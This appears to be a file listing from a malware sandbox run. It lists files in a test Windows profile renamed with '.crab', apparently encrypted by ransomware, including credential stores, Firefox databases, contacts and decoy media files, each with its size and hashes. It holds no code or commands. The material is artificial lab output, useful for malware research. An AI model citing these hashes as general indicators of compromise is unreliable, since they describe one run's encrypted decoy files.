c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\1033\14\built-in building blocks.dotx.crab 3.99 MB MD5: 571a4984c3e07a66aebc7115485223ea
SHA1: 4677ced183a7d20f88e5e4f15563e2b2a1964135
SHA256: bddc16e393a250a91ff7137a8988a0b91438256f0d14fe309c38071d9a3f84b4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\index.dat.crab 32.51 KB MD5: 1816966a801f6ecc148b139be7a84647
SHA1: 41e1ac0edb8182b78e2606ef24f8616694b79f35
SHA256: 7f512a9b311a10358d7ee9838198d1709a4f6eb11310edad6ddfd2223dc7301a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\14\1033\global.mpt.crab 382.01 KB MD5: db400a92034301e26fb298270a7b1b8c
SHA1: 212f765a52206e4191665e58e953ecd62a530465
SHA256: e589e5103cac86a67529e7062d41cc21cf00d4ac01b4ab04932bd815e606b456
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\mso1033.acl.crab 37.40 KB MD5: de188f543b4a5a17577bd75078059f57
SHA1: 0ed7ca405c02aa91b27e48e7f056129c083f01a0
SHA256: 66c9d5303261003219f000fefcfa62c0c60b955c724907cbe183f84f2f35e8ed
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\global.lnk.crab 1.91 KB MD5: 4fb30ea2ebd8d9678f76d0c3196383c1
SHA1: 7c78d6ba79249d571a82874d4163a36e888d7c45
SHA256: 5e5e70bd882249cdb36b2702f85580e7e66e5dc39d96eb8d3cac36b08ef4dd59
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\index.dat.crab 0.57 KB MD5: 386bf6407369b11a634dff2ffc267d81
SHA1: c60ebddce1932b9369bb5112a230375001f9ddce
SHA256: c4be5dc004d466f64b79940a03f8fef2434917efde21820a28e96cc6e9e522a2
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.63 KB MD5: 13daff2f8605c16ca1caeb7aa376a76f
SHA1: 8b763a39a01c9c6d46bec84bdf55f8786880d17f
SHA256: dbacb4fd4bcd69bfc1b9498c7f3b8aea274b4eee885e49dac69ac8fd2ae52074
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.01 KB MD5: 3acad2022fa4f8ba24b9b568dfdd5387
SHA1: 136b4930bb7fde04af957263322a8b0536230cad
SHA256: df629c4e924b1f01dc32cf0287602862efa7613ef03d8510ba95e3cb3df9f15a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\outlook\outlook.xml.crab 2.93 KB MD5: 7b2be5882a2628c0a97c377b2923c9c1
SHA1: da912685abccf21e0db7e08058360ad91c52db71
SHA256: ce9d658336243a27b949ec282f51de76487661606ef0559dd0a01cf5da0b498f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\credhist.crab 0.68 KB MD5: b7fde0651d3844b9ab457cf523e8a691
SHA1: 0ca2eb523d259f512fe01357c02298453202c55c
SHA256: 44732bc5dfe28cc180bc58b8fe50e096434ec6e7bf8cbe53a88fa429aca998ad
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.crab 0.98 KB MD5: 74544e3c959fdab6e58ce89b181f4d0a
SHA1: 57ffb4092f096d7aea997b62481ad0a58527acf2
SHA256: 8ea60dac8ee5d06facd4c11f7c8fe7010c6422291bd350dd178052a4d8387be5
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\preferred.crab 0.54 KB MD5: dda59e69877a0faabb5432e4c28b1c71
SHA1: a897f86845ed8d9c993255780910356b99a1653d
SHA256: 3ed8861071498fb27c42a0c7c0e1ca23078243016cee8b7ca57eced5c342ddf4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\02540a10-7eb7-4b20-a8c7-470f8986389c.crab 0.98 KB MD5: 071941c061b92aaa31b98c010e195a76
SHA1: 462a9b974ad1dc5f6fa1c771fc4f0eb4f657a381
SHA256: 42291d8872e8e9d9c8e7db053b1a3aaa7a9c06e4d8a355f46868eea76ec6d3e7
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\2be989a0-16a1-424b-9211-51aa3bb43e5d.crab 0.98 KB MD5: ba90c374404a7c68aaf5c4c483eab5ab
SHA1: 7ec17a81c3f79f1e823543d4e928bc2758c8575d
SHA256: ea355c0c82bb0581026bd4624d73682c51156019826e92296fe9ec9f5b033ea5
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\fbbe72db-afd8-443b-88dd-64b20388700d.crab 0.98 KB MD5: 86863d9cde693c5a232c9e1d47c0c04e
SHA1: 8267d503cc858ff53351b5f7464dc6bba69ba955
SHA256: 00ea3d66e5a4ab51a8bbf429c090128820ebd4a6c95b6fdef22d65ae27facf95
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\s-1-5-21-3388679973-3930757225-3770151564-1000\preferred.crab 0.54 KB MD5: bfdfaa536500236d4200738a5cc73f0e
SHA1: 135e39a43e90cccbbbc03fe90ca00ea52c0b6b7f
SHA256: 74a7a88e04fcba0d5ddb562a2e747e49b7f08981d9d773f803ab6e1b33c067f7
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\protect\synchist.crab 0.59 KB MD5: 92097b814ca75c05674d8e0f0aeeba68
SHA1: b60856bc5d2963653319f475c71ef84242a07d2f
SHA256: f88d77af5a4dba4a30da152b30384aefdb93bec6d61c76872755716392bf2fc0
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.68 KB MD5: 28e6f04dc5f617e3f6c6cc189c1a8c15
SHA1: 6abc23dc2839bbb1c9b9a14360aeb75ed74c07db
SHA256: 625d1ab185504d31ecdfe4e549e807e58673b869b731330de23050fa63fb94b6
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\templates\normal.dotm.crab 20.66 KB MD5: 5bf06ec43d1aad3465f8fb536ad30543
SHA1: 24474184317a4dc61eef71606d54dede6cdb2c83
SHA256: 8aa5841fa7e2394b1828eb3b0294b152739d4844592b26245e4fc65796655b2a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332.crab 0.52 KB MD5: 99433fa9c4a1aad892b0cefc71f5450e
SHA1: 5b118a31d845d2421c782acd1a4b0350744bd171
SHA256: 4a6b18ca9720b0560196e0453a7333e0623a03b5975797d4e92ca33d389632e4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\addons.json.crab 0.54 KB MD5: fb62dfa28926fd30ad72165158acfd95
SHA1: 1ff8102ef5047af27f88d95283edaefc16bbe85f
SHA256: 69ef64128fc1d08143351f64383aad4fd6ab1201321e378168b78d0de0a2ac8c
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-05_5.json.crab 3.48 KB MD5: d8aeb1a07a887f6b47092d32337416e8
SHA1: 00a7045b7566b5b1bebbf5ae0baceec7b6314e33
SHA256: f7fd45f7ade08d175056d07bbde2c31207030a46b50b463a88d22909332e373b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-16_5.json.crab 3.48 KB MD5: b61d9b36c0a9b6e0948b39141ccda615
SHA1: 99827d886f446cd14a93b5bdd788e0cb299a2fb5
SHA256: b74e93d88302c3e5a05e65e35a87bccf0bf50f69178b8519f6961e671153a197
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\cert8.db.crab 64.51 KB MD5: 7712c2a14ab685d96caa1eb6db8aa3c5
SHA1: 269fd26241e22634deacdb36d69d7e33ba48bde2
SHA256: 1be3036edcabd214fd09ec822c6eac50ab9e108073ffcadcc3cbb05344ca1631
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\compatibility.ini.crab 0.71 KB MD5: 861bdd9a76c8f13ecc1a216f8404626e
SHA1: c5310e6f643862353bded450e971354eab2c928f
SHA256: 75226ec0c4e30028ca419b5459dea3c6dd5d6da778129a8af0464d5912b9777b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\content-prefs.sqlite.crab 224.51 KB MD5: 65637edcd13e99bef2554ab9e6b7c393
SHA1: 27449039f97143133cc320b6227b7d2b346a0f1f
SHA256: ffd7efbc4b0f22e061e02790aa933dd836dccaf429126c0299b408481c541d6d
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\cookies.sqlite.crab 512.51 KB MD5: b52e55ff3a3fb915dd00a12929f54e22
SHA1: 6cf3414c7f8dc112086b2708baa111ec5f6243db
SHA256: 62440e7e908956c885841ee713e3a0acaa19450f249dd8047f0be9d5556fc1db
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\downloads.sqlite.crab 96.51 KB MD5: 06a66080d956aad9b91dedf5f26ec008
SHA1: 7c160ee3ead545de051b2d4a8af8ddb59f2bfed6
SHA256: 8bfb739ac3357f27f488ad965cdf9d318e8458986ccf4c0f123aea045ff9f427
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\extensions.ini.crab 0.65 KB MD5: 4d05aa9636773f03948869fcddc2255b
SHA1: 4f2d25afe23e7b7d4e182d778ac197ec63bc69dc
SHA256: 82855eb9f94e12e2f93c7f9022a67e43b912c0ac1b94089ad39ef3f39355efdd
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\extensions.sqlite.crab 448.51 KB MD5: 59bf4fbb869aabdf54d48886c41b0dc9
SHA1: 951ed2bd0800e6f2661354799fdda8e0d48621a2
SHA256: 9d83eafea1068d344c1e5b10978e54652a46e8f30a50f9217481e3b959bd32b7
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite.crab 640.51 KB MD5: 3f8b1d1a21090c706902cd602c184760
SHA1: 723d30a90234d7a8717f6e3612d40d0c8bb2e0bf
SHA256: 11409711c35892dbbab18a83dd7b239c084115465196e9e6e50439e3e9c17f8a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\key3.db.crab 16.51 KB MD5: a0b3e7b7c6ef6139f22c1345cf3db69f
SHA1: 6e2083ff5bc3be606fe6b8242d7bf2d5137eac04
SHA256: 70df366d24fac19d3ac1cc600b21d9d4156b186a36286b4553ad844ef5e0c240
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\localstore.rdf.crab 1.77 KB MD5: ea2304ed8945f089fc1ab4a1786d2d2a
SHA1: 9ba35a7e85b81ee0f348da5c8701f1e57102c051
SHA256: ca480f9c56e1ed2067368399513e6d030bb30d02c032c64d01e6b879f024914f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\marionette.log.crab 0.57 KB MD5: dabfab4250c0d6cedcba1560115b7116
SHA1: f85bb63aaabbe4eb3ab4a482be2e614ee4700051
SHA256: 2adc5303de8d58f667d053680bde70d6a732191f9ea20ca0c9fe21bd28c44c3a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\mimetypes.rdf.crab 4.26 KB MD5: c55acd8efd80f08e4e71574ed60ee708
SHA1: 4750d66b53f401e820cb9a543c8bd5511e63bc89
SHA256: 61541404be78add186adac79091252d62adb8b9d5bf52861d1fc245ec4ae177d
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\permissions.sqlite.crab 64.51 KB MD5: e1039206bd646883ec90ad9e7b8f729d
SHA1: bea71e8f70f116840dea014bc6e9645d81d49c50
SHA256: ac4458e7f13f220db00a63e29f33444d64227db217dc1d1b63935edb32746459
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\places.sqlite.crab 10.00 MB MD5: 8ec43043ec817f0154e727589d5535ed
SHA1: 35148c5cc59b978203012a7fd4dae6f28ebe531f
SHA256: 7482d83790814733b672593fa11af63423dfdfcdda0a1d2c9c1c3ca7c49f17ac
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\pluginreg.dat.crab 4.04 KB MD5: 4de74b188b633d354a479315e2be6dae
SHA1: 25d5325adff5e52748ed5549240c5591edc661aa
SHA256: 90c8fc483f2b6a814adc9dc268149736b955d2165a53fade6a1facc41b1a0457
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\prefs.js.crab 4.48 KB MD5: 18345bce62591199695d28dab8c9f4d4
SHA1: dfe71c66bdd159c96f4a37a0f0de332507ef5092
SHA256: 8e234fc21e3edc39816b33db29432dbd6de5a5bf99f3087860c7fa9d1eb0c5ae
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\search.json.crab 16.90 KB MD5: e8268002d1eaed6e7f27b1a898d35927
SHA1: 7b1f3281ea5721632a7d6506ccbbee0be1f6566b
SHA256: 852bd2bb5c35f0937b27521cfb4b97f710cf61939876a4b62950351cfffb585b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\secmod.db.crab 16.51 KB MD5: dcd362083d46cfb4aec57398908964b3
SHA1: a3f125a27680342ee6b59f48118a4bfb98f5bdbb
SHA256: 5e4d02d70438462f6e46bb8d72cd6c0a4fc5d39b63b3b5d0123618763e44f46f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\sessionstore.bak.crab 1.48 KB MD5: 8fd7068f701878c4273dbb56c5af0f1e
SHA1: b1b963ff43f4fe82049847ec58242e95969c450f
SHA256: be79cf8c9553771f03fea72cd871de9b0048ee80e394e882925406dfcf67b13b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\sessionstore.js.crab 3.46 KB MD5: f0cb38e0f33bde285e847f1daaceeba0
SHA1: 2fd434db765de3cd571644f5ec216a33cc26d266
SHA256: 86c0ab06b8470f742396b1ac71ac10aa53b7d8ba67e19705a0e707da6735c2e1
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\signons.sqlite.crab 320.51 KB MD5: b9d320a0581118ad86efcfd7899b86a2
SHA1: 1eb6f36e1d378bae01d862d01a309b9371912555
SHA256: f8dda87aa5a52828b2a0c6ee13fbe5fa9a8f436b08927ac708c1f5cef9cd2f9e
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\times.json.crab 0.54 KB MD5: 4afadc75e99869bf1a99404032cfcc27
SHA1: 402a0bec87f52f841ce5a49b483f5acdafa9b245
SHA256: 06b0632c5be0eb35cc8671ff8dd5b1cb355b56fe086c93f52be4133226af05b9
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles\silmbjec.default\webappsstore.sqlite.crab 96.51 KB MD5: 492af8cf1b95f62f23e545da9805c3b2
SHA1: 9ffe6c779f9e85775a51141efb26c912672c19fd
SHA256: f0c6163c32855b20a9a90f492aba6542079e01fdf8f067a3780b753c5e3e4e29
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mozilla\firefox\profiles.ini.crab 0.62 KB MD5: 6606b4783fe7ff0aeaf490eae530e772
SHA1: dc82f9fef2c4c46a8cc1b44e2a93fd27e778ffe8
SHA256: 37c249cb625cbc539f33a45c1fe0589ab475da6f43cced55ab92ee65e5e208ff
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\mpwe.ots.crab 38.05 KB MD5: 7d83996a033607396d1cecd6051871e8
SHA1: 16c87befde4af84d9dde256429f312ae1d2c97e0
SHA256: 6190188e3053a1f8347370494be7fd2007e8cb5452c16c30bb81d519efd895e3
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\n0j-h4axm1a_.mp3.crab 37.23 KB MD5: 58cbae4253a1a2d3b7f2a96ca3f523eb
SHA1: d2d32a3f18fcb8bcf1a4f5a247a31d79a5a5796d
SHA256: bdf12fafe256114700107c2d0534e56213ca780cb0f136f0d5b3af015c9b3e8d
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\njhqk.mp3.crab 58.34 KB MD5: 15925403f169a2db0928b4abaed46827
SHA1: 94557c29264b38565e6636c8a7512e70a6ceaee0
SHA256: 5b719ffeb81c92394aa6ba0034d84c7ec623d3644fa366a19d6861db9b861b51
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\no6oei56s1gzlyz.bmp.crab 59.98 KB MD5: d2f8559fbabb7966e3a26a07c4c840f3
SHA1: dd28e1d223781f29f1641915cba3143557db7a71
SHA256: 72742350db52488a65728fe773fd615dd307b9d1e13f23f80841651558cf4efc
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\odwlklz4.wav.crab 40.15 KB MD5: 8f8dfe2dd24ba9e5a0de285cf018f0f1
SHA1: feb4ae7c1da76f6cee32c62a162d2ef1336828fe
SHA256: eb29f564523b51cbb29c831a12e5bab3f7abd340b59bb2e4bf041668934b1501
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ovsyo7pqdjezj.jpg.crab 16.29 KB MD5: 2bc609737fe424d45dfca7c92896e1d2
SHA1: 1e14409fcfb2499df72ef96bbd85fc10a6ddb158
SHA256: 1513413aa2fbdaa5d0e3977d0a106fc4c1835545a115982ca7e31700e30055f9
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\pkbvbzek-3 dc.m4a.crab 8.20 KB MD5: 14ec30daf5d70923008a53592460c7a1
SHA1: 2588dd21ce188ddbd8b3bdf65fcf4c0442df9b61
SHA256: c72f432c275515a210723e3f49d25c1f6af19ec22f190aafc60510bdd18d391a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\tyxijnscjure.jpg.crab 94.63 KB MD5: cfdf074dcc6be1b39fdb55ebc179bc7c
SHA1: 9451714a2f4c9a10d622e5597f7c963bcc20c6e1
SHA256: 5c9e4cc49b3b93becd098bfd714dee8c2a5ccffab48f878f13b3bfdc6f70edfc
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\u-1xhgu-qj0 3jya.m4a.crab 18.18 KB MD5: 709bd269ef5755170908875a3ad947bb
SHA1: 51417b096985cb68ae6dac04a7506e181756ca66
SHA256: 6b6b00599b13e6b2881914db1802763b9e291306263ad9c48a23e98df6f75e45
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\zfdt.mp4.crab 8.34 KB MD5: 07ccc47c4945f83f3d8078f08af5b43e
SHA1: 032db88a5248eb1885d3181391ba17a316ad5847
SHA256: f86063c23ee155cf2263909beccad93491c851e2652f78c4b69f432047be6099
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\zs0mljmwh2pip6.swf.crab 14.96 KB MD5: 872bfa68ba37cb87d8f8ef7aca313b27
SHA1: 183eef3baa951144e9406eb8352870a5b003d1a9
SHA256: ecf1040976f88505fe1b4acd3bef634c4609e40928c6d2ca8ff6d04664e84e57
False
c:\users\5p5nrgjn0js halpmcxz\contacts\aclviho asldjfl.contact.crab 1.66 KB MD5: 0cb4fe7c992b4b9c401ca3ea5d890615
SHA1: 6cb11d20c82f41d5c2421c77e6892834253223ef
SHA256: ea58ecdbd747284b20e1351ef45c4a4b74afb21d3e8631ac11a95e4861c5fabe
False
c:\users\5p5nrgjn0js halpmcxz\contacts\administrator.contact.crab 67.29 KB MD5: ad237402b590d3583636d360d207246c
SHA1: 5d056c3c8530663486d2b10b0c25e2a350cbbc61
SHA256: f6f530765525eda080a6e3228f3ef59b509f585f64df7123e244696be156f673
False
c:\users\5p5nrgjn0js halpmcxz\contacts\asdlfk poopvy.contact.crab 1.66 KB MD5: 21254075c1954d19ffb5f3683a70e936
SHA1: a2047f9bd9af72e17a6f018350132a3f97bb1be6
SHA256: 33fb6ce21abc1322add42d57f11939f4b57bbc5fd4c651b3c28f33fd072b09b3
False
c:\users\5p5nrgjn0js halpmcxz\contacts\chucu jadnvk.contact.crab 1.66 KB MD5: 51c6ff51c9f54723109b27cc29bda2bf
SHA1: 71e451384cd531e5bb6386b6be11ee3020864b79
SHA256: 349a1a4bbb6ebe667345139e28bb0f1db20f18e5cdc1ac79b53dbefa83ef46af
False
c:\users\5p5nrgjn0js halpmcxz\contacts\lulcit amkdfe.contact.crab 1.66 KB MD5: b890266c6a013061b1889ff82c5a6e25
SHA1: 5b2cbdf828a23c877905a25bd20cfbc06c66617c
SHA256: 3cebed8d9c882aafcf2e68ee6c6189fc4a81696688fd81779189f9c00ce74a9c
False
c:\users\5p5nrgjn0js halpmcxz\contacts\sikvnb huvuib.contact.crab 1.66 KB MD5: 0ba26de87cfb5b3e0fda8b1e3d8d2d63
SHA1: 2da939eefef65e14643b1723e702516d739f3bf3
SHA256: 51426f52cdf26bfe857df9d1d04b3130c0150e2989f638365b7fc03a9c4ae356
False
c:\users\5p5nrgjn0js halpmcxz\desktop\10robsv5r-dxmczvr.mp3.crab 32.12 KB MD5: b6be6629523d67774627b98b1fbbfefc
SHA1: 2f4c92d0d4e8c97854d6c0923cfc32d92c2a1fe7
SHA256: 0c645e787ed1638a99bacd020b1ce04fe62a90c4e6ba294e04bcb8b8dad5dd46
False
c:\users\5p5nrgjn0js halpmcxz\desktop\2v-lprvtp1.wav.crab 8.76 KB MD5: 74b2843d54c8d3231166354222f9c3fd
SHA1: 0f97f0874812bec72d3496b30e228d3cb116720d
SHA256: f9eb933027b7f8c56ecc7d128a98094e222c843f553a729e3c8b05feaff008a2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\3fcdlh6fv9ovg5vm.swf.crab 77.21 KB MD5: f3aff3c67f54ea049cfb4c0faa879b74
SHA1: 6c40b25b96b8bc13852874454be05ce285818164
SHA256: ddbafabe2f58860182ee1b872f381be072dd5d7d805c4b71ab6e240ea947e0e2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\3rthlrdc2k0.swf.crab 36.88 KB MD5: dace0fd3563ea35b3d38ff1bbefc20d4
SHA1: e7ac63b094fe01f6bab239afd7659eccc1e55c79
SHA256: 4e627dbd40859c58ca6fb315ea58494713b8f515dac61c4f25d0b97d0b17ff96
False
c:\users\5p5nrgjn0js halpmcxz\desktop\4evdmq0pggz3r8xadm.mp4.crab 27.07 KB MD5: e374ecd1ac31d5b53c8316fd5716b0f5
SHA1: f41b3bc1f408a0e2135c9a6bcedcd56c0f558077
SHA256: a7803fe6338896203136b80f74a3d32266bc0e3a31bb85cee3ab4c4311e3a526
False
c:\users\5p5nrgjn0js halpmcxz\desktop\8dtew.wav.crab 41.45 KB MD5: 9020b626d839d05027c6f0ab9b1f7b9c
SHA1: 65f553026c4a08a7136b45972344e2d15b97f289
SHA256: 7c964ce84ed39efba6dbef4f9f2102e22cee767b97c3efc934e9db980b36a9fa
False
c:\users\5p5nrgjn0js halpmcxz\desktop\bpqeh.m4a.crab 99.71 KB MD5: 20b73002836a6044a512ce43315d495c
SHA1: 8b679c98ddee23f55ae974d0b43515ec5248640d
SHA256: f0d4112153a7de9756cc78e86fe205631f0234452831e85dcf6e2a0fc37ae238
False
c:\users\5p5nrgjn0js halpmcxz\desktop\btlmnelb6h3yyqxdqual.mp4.crab 29.85 KB MD5: 5782dc232a056c0bf29d6832af5e4163
SHA1: 48107d5caad68b7ee9deb6858c3a5dfbf980364a
SHA256: 81df32c108f9b0a17a7d8d2d739871e821f6fed71f89020414cfc2fd1c33a8a2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\csotfjimh a2.swf.crab 36.29 KB MD5: 026248b616c081283a4bf3889518982a
SHA1: 05e95595541ddfbed489db1fa2d50c7e3700070f
SHA256: 1a19acfee47cc96b487b046c3c2c50e452295cfde7ba7feb726e8ebf2fd9dfd8
False
c:\users\5p5nrgjn0js halpmcxz\desktop\cwnfgb.mp4.crab 62.09 KB MD5: fe919362801ab9ba98d8707ae1a18c06
SHA1: dddbc4e7c1178025297ed732b23db60c1bbab650
SHA256: a22249ab1c688dc6f955c6afd26a2e4acae355ababa5322778c3cd379f07ad3e
False
c:\users\5p5nrgjn0js halpmcxz\desktop\excfcss22h5icieztq36.avi.crab 69.30 KB MD5: a25c137303afe3dc5ae9899432fb59e0
SHA1: bc8716a70261f8bbd34dde038f41bde7ded57552
SHA256: 047696fdd4b41663603107b993c4b2a3addd16b26767b97f7aba745da0978aa2
False
c:\users\5p5nrgjn0js halpmcxz\desktop\gbhj8yig4wryyemy.avi.crab 14.90 KB MD5: 11881ef3e3232d5caa3a1be65915dd59
SHA1: 12bf61fabc4d687732998a58435c91e2b6c7f41a
SHA256: d27c866272d2b3f0f442e087412a72428e4beb23007ce6eee470106c613fac58
False
c:\users\5p5nrgjn0js halpmcxz\desktop\gbrght1ccujgy.swf.crab 69.99 KB MD5: 1f0096d2fa12e1099a184a6811a26cda
SHA1: c1aede9213cea322276f1907ac58bbfe5003ab61
SHA256: 6535e178ac727afbf1129dee590c05d2cd6554d71f908b8d261f99c9ce85d594
False
c:\users\5p5nrgjn0js halpmcxz\desktop\hfvdupoqg6.bmp.crab 58.02 KB MD5: a5302f53297b4d5b4e20b630760bc682
SHA1: a2001affa2138d8ac6e9b8398ce2e30d9bdf1749
SHA256: 6cc290fb4205447a8ee7e552380034542fb5535b5b5ad5cda84d149227be66eb
False
c:\users\5p5nrgjn0js halpmcxz\desktop\hkikm9bcjrllh8wkm.docx.crab 7.54 KB MD5: 0fe248014f8ea49c2ed4c07c7d1637a0
SHA1: ac3bf7275eba6385a51c1c1ab263e24c9a8ddac7
SHA256: bc7c04b104908be2a230b20d937547ad466f6ade076531fadc1a407a8060afe8
False
c:\users\5p5nrgjn0js halpmcxz\desktop\hy4vakoceqcuwqodf0f-.mkv.crab 58.66 KB MD5: 4e0e46d30fd1d58a3d04f50ec82fc576
SHA1: 8496279b647e90139f9104c2e95abc255e5df059
SHA256: 70273888cfb2b6de6aaae59f41831d313833f322a2aa0f4db76fd92fbbcae309
False
c:\users\5p5nrgjn0js halpmcxz\desktop\j-_vbyhxqcag.gif.crab 53.09 KB MD5: 38225ccc6ad4691832e508b2e90c7864
SHA1: ac6a03871ff7b592af86416622c76bd8b62b8d2f
SHA256: fab3cea086589f589503dba3df044bd335dcc967612c915d32cfb86d9facfac0
False
c:\users\5p5nrgjn0js halpmcxz\desktop\je-s6fqve k1ih 9.swf.crab 3.01 KB MD5: cad63b973e621016fc91bfc2f60a56a0
SHA1: dd259963ab68410a5876aaed6cedc139c150a602
SHA256: 542be7a78b82202f0f63a66b7c5721ebb98aeca7e086917f1ef8ad6638fca445
False
c:\users\5p5nrgjn0js halpmcxz\desktop\k64qw9_noz4xafx.xls.crab 18.66 KB MD5: ade4c447fc46dc1ed70bf25d14587323
SHA1: 79304d6325615ce6f6bb9a11ad8adc4e0f355dc1
SHA256: 06a3912e348c9ecefd19c715d1fd2d83a35c7938c340b7b8bbe11fb832713fc6
False
c:\users\5p5nrgjn0js halpmcxz\desktop\mvu8qqmt0h.bmp.crab 10.40 KB MD5: 95d04bb0ff7dd74c609563e38ec48a0e
SHA1: ab94daef2dbad92e91415dd287692e935ddac2cc
SHA256: ab6299611fade2bc417ef303a461073fac424624d0854c3a4cd7e0a3c6f19929
False
c:\users\5p5nrgjn0js halpmcxz\desktop\nhjyefk5yv k1 pz.mp3.crab 47.18 KB MD5: 19bada29ecacd59a01bd88348a7aa091
SHA1: e746c9eee160b44b92e984247779c676c436595a
SHA256: 67879e5180c35c79e86cc898cb3e2d079e659c0aec5866e8c8d259e9f0c95bf1
False
c:\users\5p5nrgjn0js halpmcxz\desktop\o0yjld4mxbtwf.avi.crab 5.01 KB MD5: 6fb6d5536bc7839727f41ea2e51e2a49
SHA1: 625cb334ab2b03bae51ad9be3ceb9486bc99f6e1
SHA256: 56c3aa5a010447f59fa25500da755046a384a7ade0731bd97cca99787017c5ed
False
c:\users\5p5nrgjn0js halpmcxz\desktop\o5xicnqyl_ru.gif.crab 81.71 KB MD5: d198649ab2a505fd09a244356cf53354
SHA1: ae6da9b7b96d007158c90d0f7a759c4c864c5357
SHA256: a81fa7fe7c9f592e62d138675a3c4adb1d21baeac377d4b13de3819e572f7a35
False
c:\users\5p5nrgjn0js halpmcxz\desktop\o_gts4saygj44bbl3b.ppt.crab 52.20 KB MD5: e17b4c9e185d3cd3a7e5fb67c81f5f6e
SHA1: 17017d1368e09a13e045524279f7928411f07cad
SHA256: bced775fa025ed1bb23502464aed9524eaf06c1e415276c807cf3585739b6c00
False
